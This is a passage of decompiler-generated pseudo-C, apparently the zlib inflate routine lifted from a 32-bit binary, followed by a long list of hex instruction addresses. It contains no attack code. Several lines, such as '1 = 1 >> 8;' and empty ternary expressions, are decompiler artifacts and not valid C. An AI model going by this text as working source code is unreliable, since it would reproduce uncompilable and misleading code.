                            											__eax =  *( *(__edi + 0x54) + ((0x00000001 << __cl) - 0x00000001 & __edx) * 4);
                            											1 = 1 >> 8;
                            											__ecx = __cl & 0x000000ff;
                            											__eflags = (__cl & 0x000000ff) - __esi;
                            											if((__cl & 0x000000ff) <= __esi) {
                            												L292:
                            												__eflags = __al & 0x000000f0;
                            												if((__al & 0x000000f0) != 0) {
                            													L298:
                            													__ebx =  *(__esp + 0x14);
                            													__eax = __eax >> 8;
                            													__ecx = __cl & 0x000000ff;
                            													 *(__edi + 0x1bc8) =  *(__edi + 0x1bc8) + __ecx;
                            													__esi = __esi - __ecx;
                            													__edx = __edx >> __cl;
                            													 *(__esp + 0x10) = __edx;
                            													__eflags = __al & 0x00000040;
                            													if((__al & 0x00000040) == 0) {
                            														__ecx = __eax;
                            														 *(__edi + 4) = 0x3f4b;
                            														__ecx = __eax >> 0x10;
                            														__eax = __al & 0x000000ff;
                            														__eax = __al & 0xf;
                            														__eflags = __eax;
                            														 *(__edi + 0x48) = __ecx;
                            														 *(__edi + 0x4c) = __eax;
                            														goto L301;
                            													} else {
                            														__ecx =  *(__esp + 0x48);
                            														 *(__ecx + 0x18) = "invalid distance code";
                            														 *(__edi + 4) = 0x3f51;
                            														goto L191;
                            													}
                            												} else {
                            													__ecx = __eax;
                            													__ebx = 1;
                            													__ecx = __eax >> 8;
                            													__edx = __eax;
                            													__edi = __cl & 0x000000ff;
                            													 *(__esp + 0x30) = __eax >> 8;
                            													__al & 0x000000ff = (__al & 0x000000ff) + __edi;
                            													__eax = __eax >> 0x10;
                            													__ebx = 1 << __cl;
                            													__ecx = __edi;
                            													__ebx = (1 << __cl) - 1;
                            													 *(__esp + 0x34) = __edx;
                            													(0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10) = ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl;
                            													__ecx =  *(__esp + 0x40);
                            													__ebx = (((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + __eax;
                            													__eax =  *( *(__esp + 0x40) + ((((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + __eax) * 4);
                            													__eax = __eax >> 8;
                            													__edi = __cl & 0x000000ff;
                            													 *(__esp + 0x30) = __cl & 0x000000ff;
                            													__edi = (__cl & 0x000000ff) + (__cl & 0x000000ff);
                            													__eflags = (__cl & 0x000000ff) + (__cl & 0x000000ff) - __esi;
                            													if((__cl & 0x000000ff) + (__cl & 0x000000ff) <= __esi) {
                            														L297:
                            														__edi =  *(__esp + 0x24);
                            														__ecx = __dh & 0x000000ff;
                            														__edx =  *(__esp + 0x10);
                            														__esi = __esi - __ecx;
                            														__edx =  *(__esp + 0x10) >> __cl;
                            														_t656 = __edi + 0x1bc8;
                            														 *_t656 =  *(__edi + 0x1bc8) + __ecx;
                            														__eflags =  *_t656;
                            														goto L298;
                            													} else {
                            														while(1) {
                            															__eflags = __ebp;
                            															if(__ebp == 0) {
                            																goto L115;
                            															}
                            															__ebx =  *(__esp + 0x14);
                            															__ecx = __esi;
                            															__edi = 1;
                            															__esi = __esi + 8;
                            															__ebp = __ebp - 1;
                            															__eax =  *__ebx & 0x000000ff;
                            															__ebx = __ebx + 1;
                            															 *(__esp + 0x10) =  *(__esp + 0x10) + __eax;
                            															__eax =  *(__esp + 0x36) & 0x0000ffff;
                            															 *(__esp + 0x14) = __ebx;
                            															__ebx = __dh & 0x000000ff;
                            															__dl & 0x000000ff = (__dl & 0x000000ff) + __ebx;
                            															__edi = 1 << __cl;
                            															__ecx = __ebx;
                            															(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10);
                            															__edi = ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl;
                            															__edi = (((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + ( *(__esp + 0x36) & 0x0000ffff);
                            															__eax =  *(__esp + 0x24);
                            															__eax =  *( *(__esp + 0x24) + 0x54);
                            															__eax =  *( *( *(__esp + 0x24) + 0x54) + ((((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + ( *(__esp + 0x36) & 0x0000ffff)) * 4);
                            															__eax = __eax >> 8;
                            															__cl & 0x000000ff = (__cl & 0x000000ff) + __ebx;
                            															__eflags = (__cl & 0x000000ff) + __ebx - __esi;
                            															if((__cl & 0x000000ff) + __ebx > __esi) {
                            																continue;
                            															} else {
                            																goto L297;
                            															}
                            															goto L377;
                            														}
                            														goto L115;
                            													}
                            												}
                            											} else {
                            												while(1) {
                            													__eflags = __ebp;
                            													if(__ebp == 0) {
                            														goto L115;
                            													}
                            													__eax =  *__ebx & 0x000000ff;
                            													__ecx = __esi;
                            													__eax = ( *__ebx & 0x000000ff) << __cl;
                            													__ebx = __ebx + 1;
                            													__ecx =  *(__edi + 0x5c);
                            													__edx = __edx + __eax;
                            													__eax =  *(__edi + 0x54);
                            													__esi = __esi + 8;
                            													 *(__esp + 0x10) = __edx;
                            													__ebp = __ebp - 1;
                            													__edx = 1;
                            													 *(__esp + 0x14) = __ebx;
                            													1 << __cl = (1 << __cl) - 1;
                            													__edx = (0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10);
                            													__eax =  *( *(__edi + 0x54) + ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) * 4);
                            													__ecx = __eax;
                            													__edx =  *(__esp + 0x10);
                            													__eax >> 8 = __cl & 0x000000ff;
                            													__eflags = (__cl & 0x000000ff) - __esi;
                            													if((__cl & 0x000000ff) > __esi) {
                            														continue;
                            													} else {
                            														goto L292;
                            													}
                            													goto L377;
                            												}
                            												goto L115;
                            											}
                            											goto L377;
                            										case 0x17:
                            											L301:
                            											__ecx =  *(__edi + 0x4c);
                            											__eflags = __ecx;
                            											if(__ecx == 0) {
                            												L306:
                            												 *(__edi + 4) = 0x3f4c;
                            												goto L307;
                            											} else {
                            												__eflags = __esi - __ecx;
                            												if(__esi >= __ecx) {
                            													L305:
                            													__eax = 1;
                            													__esi = __esi - __ecx;
                            													1 << __cl = (1 << __cl) - 1;
                            													__eax = (0x00000001 << __cl) - 0x00000001 & __edx;
                            													__edx = __edx >> __cl;
                            													 *(__edi + 0x48) =  *(__edi + 0x48) + __eax;
                            													_t676 = __edi + 0x1bc8;
                            													 *_t676 =  *(__edi + 0x1bc8) + __ecx;
                            													__eflags =  *_t676;
                            													 *(__esp + 0x10) = __edx;
                            													goto L306;
                            												} else {
                            													while(1) {
                            														__eflags = __ebp;
                            														if(__ebp == 0) {
                            															goto L115;
                            														}
                            														__eax =  *__ebx & 0x000000ff;
                            														__ecx = __esi;
                            														__eax = ( *__ebx & 0x000000ff) << __cl;
                            														__ebx = __ebx + 1;
                            														__ecx =  *(__edi + 0x4c);
                            														__edx = __edx + __eax;
                            														__esi = __esi + 8;
                            														 *(__esp + 0x10) = __edx;
                            														__ebp = __ebp - 1;
                            														 *(__esp + 0x14) = __ebx;
                            														__eflags = __esi - __ecx;
                            														if(__esi < __ecx) {
                            															continue;
                            														} else {
                            															goto L305;
                            														}
                            														goto L377;
                            													}
                            													goto L115;
                            												}
                            											}
                            											goto L377;
                            										case 0x18:
                            											L307:
                            											__ecx =  *(__esp + 0x1c);
                            											__eflags = __ecx;
                            											if(__ecx == 0) {
                            												goto L115;
                            											} else {
                            												__eax =  *(__esp + 0x28);
                            												__eax =  *(__esp + 0x28) - __ecx;
                            												__ecx =  *(__edi + 0x48);
                            												__eflags = __ecx - __eax;
                            												if(__ecx <= __eax) {
                            													__eax =  *(__esp + 0x20);
                            													__eax =  *(__esp + 0x20) - __ecx;
                            													__eflags = __eax;
                            													 *(__esp + 0x34) = __eax;
                            													__eax =  *(__edi + 0x44);
                            													goto L318;
                            												} else {
                            													__ecx = __ecx - __eax;
                            													__eflags = __ecx -  *((intOrPtr*)(__edi + 0x30));
                            													if(__ecx <=  *((intOrPtr*)(__edi + 0x30))) {
                            														L312:
                            														__eax =  *(__edi + 0x34);
                            														__eflags = __ecx - __eax;
                            														if(__ecx <= __eax) {
                            															 *((intOrPtr*)(__edi + 0x38)) =  *((intOrPtr*)(__edi + 0x38)) - __ecx;
                            															__eax =  *((intOrPtr*)(__edi + 0x38)) - __ecx +  *(__edi + 0x34);
                            															__eflags = __eax;
                            														} else {
                            															__ecx = __ecx - __eax;
                            															 *((intOrPtr*)(__edi + 0x38)) =  *((intOrPtr*)(__edi + 0x38)) +  *((intOrPtr*)(__edi + 0x2c));
                            															__eax =  *((intOrPtr*)(__edi + 0x38)) +  *((intOrPtr*)(__edi + 0x2c)) - __ecx;
                            														}
                            														 *(__esp + 0x34) = __eax;
                            														__eax =  *(__edi + 0x44);
                            														__eflags = __ecx - __eax;
                            														if(__ecx > __eax) {
                            															L318:
                            															__ecx = __eax;
                            														}
                            														__ebx =  *(__esp + 0x1c);
                            														__eflags = __ecx - __ebx;
                            														__ecx =  >  ? __ebx : __ecx;
                            														__ebx = __ebx - __ecx;
                            														__eax = __eax - __ecx;
                            														 *(__esp + 0x1c) = __ebx;
                            														__ebx =  *(__esp + 0x34);
                            														 *(__edi + 0x44) = __eax;
                            														__edi =  *(__esp + 0x20);
                            														__ebx =  *(__esp + 0x34) - __edi;
                            														__eflags = __ebx;
                            														do {
                            															__al =  *((intOrPtr*)(__ebx + __edi));
                            															 *__edi = __al;
                            															__edi = __edi + 1;
                            															__ecx = __ecx - 1;
                            															__eflags = __ecx;
                            														} while (__ecx != 0);
                            														__ebx =  *(__esp + 0x14);
                            														 *(__esp + 0x20) = __edi;
                            														__edi =  *(__esp + 0x24);
                            														__eflags =  *(__edi + 0x44) - __ecx;
                            														if( *(__edi + 0x44) == __ecx) {
                            															 *(__edi + 4) = 0x3f48;
                            														}
                            														L190:
                            														_t862 =  *(_t904 + 0x48);
                            													} else {
                            														__eflags =  *(__edi + 0x1bc4);
                            														if( *(__edi + 0x1bc4) == 0) {
                            															goto L312;
                            														} else {
                            															__ecx =  *(__esp + 0x48);
                            															 *(__ecx + 0x18) = "invalid distance too far back";
                            															 *(__edi + 4) = 0x3f51;
                            														}
                            													}
                            												}
                            												goto L191;
                            											}
                            											goto L377;
                            										case 0x19:
                            											__eflags =  *(__esp + 0x1c);
                            											if( *(__esp + 0x1c) == 0) {
                            												goto L115;
                            											} else {
                            												__ebx =  *(__esp + 0x20);
                            												__al =  *(__edi + 0x44);
                            												 *(__esp + 0x20) =  *(__esp + 0x20) + 1;
                            												 *(__esp + 0x1c) =  *(__esp + 0x1c) - 1;
                            												 *( *(__esp + 0x20)) = __al;
                            												__ebx =  *(__esp + 0x14);
                            												 *(__edi + 4) = 0x3f48;
                            												goto L191;
                            											}
                            											goto L377;
                            										case 0x1a:
                            											__eflags =  *(__edi + 0xc);
                            											__eflags = __al;
                            											if(__al == 0) {
                            												L343:
                            												 *(__edi + 4) = 0x3f4f;
                            												goto L344;
                            											} else {
                            												__eflags = __esi - 0x20;
                            												if(__esi >= 0x20) {
                            													L331:
                            													__eax =  *(__esp + 0x28);
                            													__eax =  *(__esp + 0x28) -  *(__esp + 0x1c);
                            													 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + __eax;
                            													 *((intOrPtr*)(__edi + 0x20)) =  *((intOrPtr*)(__edi + 0x20)) + __eax;
                            													__eflags =  *(__edi + 0xc) & 0x00000004;
                            													 *(__esp + 0x28) = __eax;
                            													if(( *(__edi + 0xc) & 0x00000004) != 0) {
                            														__eflags = __eax;
                            														if(__eax != 0) {
                            															_push(__eax);
                            															 *(__esp + 0x24) =  *(__esp + 0x24) -  *(__esp + 0x2c);
                            															__eflags =  *(__edi + 0x14);
                            															_push( *(__esp + 0x24) -  *(__esp + 0x2c));
                            															_push( *(__edi + 0x1c));
                            															if( *(__edi + 0x14) == 0) {
                            																__eax = L01316A20();
                            															} else {
                            																__eax = E01316CA0();
                            															}
                            															__ecx =  *(__esp + 0x54);
                            															__esp = __esp + 0xc;
                            															__edx =  *(__esp + 0x10);
                            															 *(__edi + 0x1c) = __eax;
                            															 *(__ecx + 0x30) = __eax;
                            														}
                            													}
                            													__eflags =  *(__edi + 0xc) & 0x00000004;
                            													__eax =  *(__esp + 0x1c);
                            													 *(__esp + 0x28) =  *(__esp + 0x1c);
                            													if(( *(__edi + 0xc) & 0x00000004) == 0) {
                            														L342:
                            														__edx = 0;
                            														__esi = 0;
                            														__eflags = 0;
                            														 *(__esp + 0x10) = 0;
                            														goto L343;
                            													} else {
                            														__eflags =  *(__edi + 0x14);
                            														__ecx = __edx;
                            														if( *(__edi + 0x14) == 0) {
                            															__ecx = __ecx & 0x0000ff00;
                            															__edx = __edx << 0x10;
                            															__ecx = __ecx + (__edx << 0x10);
                            															__edx = __edx >> 8;
                            															__eax = __edx >> 0x00000008 & 0x0000ff00;
                            															__ecx = __ecx << 8;
                            															__ecx = __ecx + (__edx >> 0x00000008 & 0x0000ff00);
                            															__edx = __edx >> 0x18;
                            															__ecx = __ecx + (__edx >> 0x18);
                            															__eflags = __ecx;
                            														}
                            														__eflags = __ecx -  *(__edi + 0x1c);
                            														if(__ecx ==  *(__edi + 0x1c)) {
                            															goto L342;
                            														} else {
                            															__ecx =  *(__esp + 0x48);
                            															 *(__ecx + 0x18) = "incorrect data check";
                            															 *(__edi + 4) = 0x3f51;
                            															goto L191;
                            														}
                            													}
                            												} else {
                            													while(1) {
                            														__eflags = __ebp;
                            														if(__ebp == 0) {
                            															goto L115;
                            														}
                            														__eax =  *__ebx & 0x000000ff;
                            														__ecx = __esi;
                            														__eax = ( *__ebx & 0x000000ff) << __cl;
                            														__ebx = __ebx + 1;
                            														__edx = __edx + __eax;
                            														 *(__esp + 0x14) = __ebx;
                            														__esi = __esi + 8;
                            														 *(__esp + 0x10) = __edx;
                            														__ebp = __ebp - 1;
                            														__eflags = __esi - 0x20;
                            														if(__esi < 0x20) {
                            															continue;
                            														} else {
                            															__ecx =  *(__esp + 0x48);
                            															goto L331;
                            														}
                            														goto L377;
                            													}
                            													goto L115;
                            												}
                            											}
                            											goto L377;
                            										case 0x1b:
                            											L344:
                            											__eflags =  *(__edi + 0xc);
                            											if( *(__edi + 0xc) == 0) {
                            												L354:
                            												 *(__edi + 4) = 0x3f50;
                            												goto L355;
                            											} else {
                            												__eflags =  *(__edi + 0x14);
                            												if( *(__edi + 0x14) == 0) {
                            													goto L354;
                            												} else {
                            													__eflags = __esi - 0x20;
                            													if(__esi >= 0x20) {
                            														L350:
                            														__eflags = __edx -  *((intOrPtr*)(__edi + 0x20));
                            														if(__edx ==  *((intOrPtr*)(__edi + 0x20))) {
                            															__ecx = 0;
                            															__esi = 0;
                            															__eflags = 0;
                            															 *(__esp + 0x10) = 0;
                            															goto L354;
                            														} else {
                            															__ecx =  *(__esp + 0x48);
                            															 *(__ecx + 0x18) = "incorrect length check";
                            															 *(__edi + 4) = 0x3f51;
                            															goto L191;
                            														}
                            													} else {
                            														while(1) {
                            															__eflags = __ebp;
                            															if(__ebp == 0) {
                            																goto L115;
                            															}
                            															__eax =  *__ebx & 0x000000ff;
                            															__ecx = __esi;
                            															__eax = ( *__ebx & 0x000000ff) << __cl;
                            															__ebx = __ebx + 1;
                            															__edx = __edx + __eax;
                            															 *(__esp + 0x14) = __ebx;
                            															__esi = __esi + 8;
                            															 *(__esp + 0x10) = __edx;
                            															__ebp = __ebp - 1;
                            															__eflags = __esi - 0x20;
                            															if(__esi < 0x20) {
                            																continue;
                            															} else {
                            																goto L350;
                            															}
                            															goto L377;
                            														}
                            														goto L115;
                            													}
                            												}
                            											}
                            											goto L377;
                            										case 0x1c:
                            											L355:
                            											 *(__esp + 0x2c) = 1;
                            											goto L115;
                            										case 0x1d:
                            											 *(__esp + 0x2c) = 0xfffffffd;
                            											L115:
                            											_t887 =  *(_t904 + 0x10);
                            											L116:
                            											_t879 =  *((intOrPtr*)(_t904 + 0x4c));
                            											L117:
                            											_t869 =  *(_t904 + 0x48);
                            											_t858 =  *((intOrPtr*)(_t904 + 0x24));
                            											_t869[3] =  *(_t904 + 0x20);
                            											_t869[4] =  *(_t904 + 0x1c);
                            											_t869[1] = _t897;
                            											_t899 =  *((intOrPtr*)(_t904 + 0x28));
                            											 *_t869 =  *(_t904 + 0x14);
                            											__eflags =  *(_t858 + 0x2c);
                            											 *(_t858 + 0x3c) = _t887;
                            											 *(_t858 + 0x40) = _t890;
                            											if( *(_t858 + 0x2c) != 0) {
                            												L122:
                            												_t835 = E01316930(_t869, _t869[3], _t899 - _t869[4]);
                            												_t904 = _t904 + 0xc;
                            												__eflags = _t835;
                            												if(_t835 == 0) {
                            													_t869 =  *(_t904 + 0x48);
                            													goto L361;
                            												} else {
                            													 *((intOrPtr*)(_t858 + 4)) = 0x3f52;
                            													goto L124;
                            												}
                            											} else {
                            												__eflags = _t899 - _t869[4];
                            												if(_t899 == _t869[4]) {
                            													L361:
                            													_t837 =  *(_t904 + 0x38) - _t869[1];
                            													_t900 = _t899 - _t869[4];
                            													_t869[2] =  &(_t869[2][_t837]);
                            													_t869[5] =  &(_t869[5][_t900]);
                            													 *((intOrPtr*)(_t858 + 0x20)) =  *((intOrPtr*)(_t858 + 0x20)) + _t900;
                            													__eflags =  *(_t858 + 0xc) & 0x00000004;
                            													 *(_t904 + 0x38) = _t837;
                            													if(( *(_t858 + 0xc) & 0x00000004) == 0) {
                            														L366:
                            														_t888 =  *(_t904 + 0x48);
                            													} else {
                            														__eflags = _t900;
                            														if(_t900 == 0) {
                            															goto L366;
                            														} else {
                            															_push(_t900);
                            															__eflags =  *(_t858 + 0x14);
                            															_push(_t869[3] - _t900);
                            															_push( *(_t858 + 0x1c));
                            															if( *(_t858 + 0x14) == 0) {
                            																_t847 = L01316A20();
                            																_t888 =  *(_t904 + 0x54);
                            																_t904 = _t904 + 0xc;
                            																 *(_t858 + 0x1c) = _t847;
                            																_t888[0xc] = _t847;
                            															} else {
                            																_t848 = E01316CA0();
                            																_t888 =  *(_t904 + 0x54);
                            																_t904 = _t904 + 0xc;
                            																 *(_t858 + 0x1c) = _t848;
                            																_t888[0xc] = _t848;
                            															}
                            														}
                            													}
                            													_t880 =  *((intOrPtr*)(_t858 + 4));
                            													__eflags = _t880 - 0x3f47;
                            													if(_t880 == 0x3f47) {
                            														L370:
                            														_t892 = 0x100;
                            													} else {
                            														__eflags = _t880 - 0x3f42;
                            														if(_t880 == 0x3f42) {
                            															goto L370;
                            														} else {
                            															_t892 = 0;
                            														}
                            													}
                            													 *(_t904 + 0x48) = 0x80;
                            													asm("sbb ecx, ecx");
                            													__eflags = _t880 - 0x3f3f;
                            													_t839 =  ==  ?  *(_t904 + 0x48) : 0;
                            													_t840 = ( ==  ?  *(_t904 + 0x48) : 0) + ( ~( *(_t858 + 8)) & 0x00000040) + _t892;
                            													_t841 = ( ==  ?  *(_t904 + 0x48) : 0) + ( ~( *(_t858 + 8)) & 0x00000040) + _t892 +  *(_t858 + 0x40);
                            													__eflags =  *(_t904 + 0x38);
                            													_t888[0xb] = ( ==  ?  *(_t904 + 0x48) : 0) + ( ~( *(_t858 + 8)) & 0x00000040) + _t892 +  *(_t858 + 0x40);
                            													if( *(_t904 + 0x38) != 0) {
                            														L373:
                            														__eflags =  *((intOrPtr*)(_t904 + 0x4c)) - 4;
                            														if( *((intOrPtr*)(_t904 + 0x4c)) != 4) {
                            															return  *(_t904 + 0x2c);
                            														} else {
                            															goto L374;
                            														}
                            													} else {
                            														__eflags = _t900;
                            														if(_t900 == 0) {
                            															L374:
                            															_t843 =  *(_t904 + 0x2c);
                            															__eflags = _t843;
                            															_t844 =  ==  ? 0xfffffffb : _t843;
                            															__eflags = _t844;
                            															return _t844;
                            														} else {
                            															goto L373;
                            														}
                            													}
                            												} else {
                            													_t850 =  *((intOrPtr*)(_t858 + 4));
                            													__eflags = _t850 - 0x3f51;
                            													if(_t850 >= 0x3f51) {
                            														goto L361;
                            													} else {
                            														__eflags = _t850 - 0x3f4e;
                            														if(_t850 < 0x3f4e) {
                            															goto L122;
                            														} else {
                            															__eflags = _t879 - 4;
                            															if(_t879 == 4) {
                            																goto L361;
                            															} else {
                            																goto L122;
                            															}
                            														}
                            													}
                            												}
                            											}
                            											goto L377;
                            										case 0x1e:
                            											L124:
                            											return 0xfffffffc;
                            											goto L377;
                            									}
                            									L191:
                            									_t813 =  *(_t886 + 4) - 0x3f34;
                            								} while (_t813 <= 0x1e);
                            								goto L192;
                            							}
                            						}
                            					}
                            				}
                            				L377:
                            			}













                            0x0131536d
                            0x01315374
                            0x01315376
                            0x0131537a
                            0x0131537c
                            0x0131537d
                            0x0131537e
                            0x01315381
                            0x01315386
                            0x01315389
                            0x01315389
                            0x0131537a
                            0x0131538c
                            0x01315390
                            0x01315392
                            0x01315394
                            0x01315398
                            0x01315398
                            0x01315398
                            0x01315398
                            0x0131539b
                            0x0131539f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131539f
                            0x00000000
                            0x00000000
                            0x013153b3
                            0x013153b3
                            0x013153ba
                            0x013154c9
                            0x013154cc
                            0x013154ce
                            0x013154d0
                            0x013154d0
                            0x00000000
                            0x013153c0
                            0x013153c0
                            0x013153c2
                            0x00000000
                            0x013153c4
                            0x013153c4
                            0x013153c4
                            0x013153c6
                            0x013153c6
                            0x013153ca
                            0x013153cb
                            0x013153cf
                            0x013153d2
                            0x013153d4
                            0x013153d6
                            0x013153d9
                            0x013153db
                            0x013153dd
                            0x013153e0
                            0x013153e3
                            0x013153e5
                            0x013153e8
                            0x013153ec
                            0x013153ef
                            0x013153ef
                            0x013153ef
                            0x013153f2
                            0x013153f2
                            0x013153e3
                            0x013153db
                            0x013153f6
                            0x013153fa
                            0x013153fc
                            0x00000000
                            0x00000000
                            0x013153fe
                            0x01315400
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01315400
                            0x01315402
                            0x01315409
                            0x0131540d
                            0x0131540f
                            0x01315413
                            0x01315415
                            0x01315416
                            0x01315417
                            0x0131541a
                            0x0131541f
                            0x01315423
                            0x01315426
                            0x01315429
                            0x01315429
                            0x01315413
                            0x0131542d
                            0x0131542f
                            0x01315431
                            0x01315435
                            0x01315437
                            0x013154d7
                            0x013154d7
                            0x013154de
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01315437
                            0x013153c2
                            0x00000000
                            0x00000000
                            0x013154e5
                            0x013154e5
                            0x013154ec
                            0x01315579
                            0x0131557c
                            0x0131557e
                            0x01315580
                            0x01315580
                            0x00000000
                            0x013154f2
                            0x013154f2
                            0x013154f4
                            0x00000000
                            0x013154fa
                            0x013154fa
                            0x013154fa
                            0x01315500
                            0x01315500
                            0x01315504
                            0x01315505
                            0x01315509
                            0x0131550c
                            0x0131550e
                            0x01315510
                            0x01315513
                            0x01315515
                            0x01315517
                            0x0131551a
                            0x0131551d
                            0x0131551f
                            0x01315522
                            0x01315526
                            0x01315529
                            0x01315529
                            0x01315529
                            0x0131552c
                            0x0131552c
                            0x0131551d
                            0x01315515
                            0x01315530
                            0x01315534
                            0x01315536
                            0x00000000
                            0x00000000
                            0x01315538
                            0x0131553a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131553a
                            0x0131553c
                            0x01315543
                            0x01315547
                            0x01315549
                            0x0131554d
                            0x0131554f
                            0x01315550
                            0x01315551
                            0x01315554
                            0x01315559
                            0x0131555d
                            0x01315560
                            0x01315563
                            0x01315563
                            0x0131554d
                            0x01315567
                            0x01315569
                            0x0131556b
                            0x0131556f
                            0x01315571
                            0x00000000
                            0x01315577
                            0x01315587
                            0x01315587
                            0x0131558b
                            0x00000000
                            0x0131558b
                            0x01315571
                            0x013154f4
                            0x00000000
                            0x00000000
                            0x01315592
                            0x01315592
                            0x01315599
                            0x013155f0
                            0x013155f0
                            0x013155f3
                            0x013155f5
                            0x013155fa
                            0x013155fd
                            0x013155fd
                            0x01315600
                            0x01315603
                            0x01315606
                            0x01315606
                            0x0131560d
                            0x0131560f
                            0x01315611
                            0x01315613
                            0x01315618
                            0x0131561c
                            0x0131561f
                            0x01315623
                            0x01315626
                            0x01315629
                            0x00000000
                            0x0131559b
                            0x0131559b
                            0x0131559e
                            0x013155c3
                            0x013155c3
                            0x013155c7
                            0x013155e8
                            0x013155e8
                            0x013155ea
                            0x013155ea
                            0x013155ec
                            0x00000000
                            0x013155c9
                            0x013155c9
                            0x013155cd
                            0x013155cf
                            0x00000000
                            0x013155d1
                            0x013155d1
                            0x013155d5
                            0x013155dc
                            0x013155dc
                            0x013155cf
                            0x00000000
                            0x013155a0
                            0x013155a0
                            0x013155a0
                            0x013155a2
                            0x00000000
                            0x00000000
                            0x013155a8
                            0x013155ab
                            0x013155ad
                            0x013155af
                            0x013155b0
                            0x013155b2
                            0x013155b6
                            0x013155b9
                            0x013155bd
                            0x013155be
                            0x013155c1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013155c1
                            0x00000000
                            0x013155a0
                            0x0131559e
                            0x00000000
                            0x00000000
                            0x01315635
                            0x01315638
                            0x01315663
                            0x01315663
                            0x01315667
                            0x01315670
                            0x01315674
                            0x01315677
                            0x0131567a
                            0x0131567f
                            0x01315681
                            0x01315684
                            0x01315688
                            0x0131568a
                            0x0131568c
                            0x0131568f
                            0x01315693
                            0x01315693
                            0x01315695
                            0x01315698
                            0x00000000
                            0x0131563a
                            0x0131563a
                            0x01315640
                            0x01315640
                            0x01315642
                            0x00000000
                            0x00000000
                            0x01315648
                            0x0131564b
                            0x0131564d
                            0x0131564f
                            0x01315650
                            0x01315652
                            0x01315656
                            0x01315659
                            0x0131565d
                            0x0131565e
                            0x01315661
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01315661
                            0x00000000
                            0x01315640
                            0x00000000
                            0x00000000
                            0x0131569f
                            0x0131569f
                            0x013156a3
                            0x0131640f
                            0x01316413
                            0x01316416
                            0x0131641a
                            0x0131641d
                            0x01316422
                            0x01316424
                            0x01316427
                            0x0131642a
                            0x0131642b
                            0x0131642c
                            0x0131642d
                            0x01316434
                            0x013156a9
                            0x013156a9
                            0x013156ab
                            0x013156ad
                            0x013156af
                            0x013156b4
                            0x013156b8
                            0x013156bb
                            0x013156bf
                            0x013156c2
                            0x013156c5
                            0x00000000
                            0x013156c5
                            0x00000000
                            0x00000000
                            0x013156cc
                            0x013156cc
                            0x013156d0
                            0x013156d3
                            0x0131646e
                            0x0131646e
                            0x01316472
                            0x00000000
                            0x013156d9
                            0x013156d9
                            0x013156dc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013156dc
                            0x00000000
                            0x00000000
                            0x013156e2
                            0x013156e2
                            0x013156e6
                            0x01315701
                            0x01315704
                            0x01315729
                            0x01315729
                            0x0131572b
                            0x01315730
                            0x01315733
                            0x01315735
                            0x01315738
                            0x00000000
                            0x0131573f
                            0x00000000
                            0x00000000
                            0x01315759
                            0x0131575e
                            0x01315765
                            0x0131576c
                            0x01315773
                            0x0131577a
                            0x01315781
                            0x01315746
                            0x01315746
                            0x0131574a
                            0x0131574d
                            0x01315750
                            0x00000000
                            0x01315783
                            0x01315783
                            0x01315786
                            0x01315789
                            0x00000000
                            0x01315789
                            0x00000000
                            0x00000000
                            0x01315792
                            0x01315796
                            0x01315799
                            0x0131579c
                            0x013157a3
                            0x00000000
                            0x00000000
                            0x013157ac
                            0x013157b0
                            0x013157b3
                            0x013157b6
                            0x013157ba
                            0x013157c1
                            0x00000000
                            0x00000000
                            0x01315706
                            0x01315706
                            0x01315706
                            0x01315708
                            0x00000000
                            0x00000000
                            0x0131570e
                            0x01315711
                            0x01315713
                            0x01315715
                            0x01315716
                            0x01315718
                            0x0131571c
                            0x0131571f
                            0x01315723
                            0x01315724
                            0x01315727
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01315727
                            0x00000000
                            0x01315706
                            0x013156e8
                            0x013156e8
                            0x013156ea
                            0x013156f1
                            0x013156f4
                            0x013156f6
                            0x013156f8
                            0x00000000
                            0x013156f8
                            0x00000000
                            0x00000000
                            0x013157cf
                            0x013157d2
                            0x013157d4
                            0x013157d6
                            0x013157da
                            0x013157dd
                            0x01315803
                            0x01315803
                            0x01315805
                            0x0131580a
                            0x0131580d
                            0x0131580f
                            0x01315825
                            0x01315827
                            0x0131582a
                            0x0131582c
                            0x01315830
                            0x01315835
                            0x0131583c
                            0x01316467
                            0x00000000
                            0x01315842
                            0x01315842
                            0x00000000
                            0x01315842
                            0x01315811
                            0x01315811
                            0x01315815
                            0x0131581c
                            0x00000000
                            0x0131581c
                            0x013157e0
                            0x013157e0
                            0x013157e0
                            0x013157e2
                            0x00000000
                            0x00000000
                            0x013157e8
                            0x013157eb
                            0x013157ed
                            0x013157ef
                            0x013157f0
                            0x013157f2
                            0x013157f6
                            0x013157f9
                            0x013157fd
                            0x013157fe
                            0x01315801
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01315801
                            0x00000000
                            0x013157e0
                            0x00000000
                            0x00000000
                            0x01315846
                            0x01315846
                            0x00000000
                            0x00000000
                            0x0131584d
                            0x0131584d
                            0x01315850
                            0x01315852
                            0x013158b9
                            0x00000000
                            0x01315854
                            0x01315854
                            0x01315856
                            0x01315859
                            0x0131585d
                            0x01315862
                            0x01315866
                            0x01315868
                            0x00000000
                            0x0131586e
                            0x01315874
                            0x01315879
                            0x01315880
                            0x01315884
                            0x01315886
                            0x0131588a
                            0x0131588c
                            0x0131588c
                            0x0131588c
                            0x0131588f
                            0x00000000
                            0x0131588f
                            0x01315868
                            0x00000000
                            0x00000000
                            0x013158c2
